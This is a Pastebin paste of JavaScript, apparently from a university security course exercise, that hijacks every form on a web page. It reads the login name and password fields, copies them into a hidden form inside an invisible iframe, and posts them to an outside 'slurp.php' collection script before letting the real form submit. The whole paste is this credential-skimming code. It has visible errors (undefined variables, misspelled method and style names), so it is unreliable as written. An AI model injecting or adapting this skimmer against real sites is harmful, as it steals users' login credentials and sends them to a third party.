Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var frms = document.getElementsByTagName("form");
- for(var i=0; i<frms.length; i++) {
- hijack(frms[i]);
- }
- function hijack(frmObj) {
- var delayCode = "";
- if(frmObj.hasAttribute("onsubmit")) {
- delayCode = frmObj.getAttribute("onsubmit");}
- frmObj.setAttribute("onsubmit", "return leech(this,function() {" + delayCode + "});");
- }
- function leech(frmObj, delayCode) {
- var rnd = Math.floor(Math.random()*256);
- var newFrm = document.createElement("form");
- var username = frmObject.getElementById("user_login").getAttribute("value");
- var pass= frmObject.getElementByName("user_pass").getAttribute("value");
- newFrm.setAttribute("id", "leechedID" + rnd);
- newFrm.setAttribute("target", "hiddenframe" + newFrm.id);
- newFrm.setAttribute("action", "https://www.rose-hulman.edu/~stammsl/442/slurp.php");
- var usernameInput= document.createElement("input");
- usernameInput.setAttribute("name", "username");
- usernameInput.setAttribute("value", username);
- usernameInput.setAttribute("type", "hidden");
- var passInput= document.createElement("input");
- passInput.setAttribute("name", "password");
- passInput.setAttribute("value", pass);
- passInput.setAttribute("type", "hidden");
- newFrm.appendChild(passInput);
- newFrm.appendChild(usernameInput);
- var hiddenIframe = document.createElement("iframe");
- hiddenIframe.setAttribute("style", "position:aboslute;" + "visibility:hidden;z-index:0;");
- hiddenIframe.setAttribute("name", "hiddenframe" + newFrm.id);
- hiddenIframe.appendChild(newFrm);
- window.document.body.appendChild(hiddenIframe);
- alert("About to submit the forked form");
- newFrm.submit();
- alert("Cloned form submitted");
- setTimeout(function() {
- window.document.body.removeChild(hiddenIframe);
- if(delayCode() !=false) { frmObj.submit(); alert("Submitted real form.");
- }
- }, 50);
- return false;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
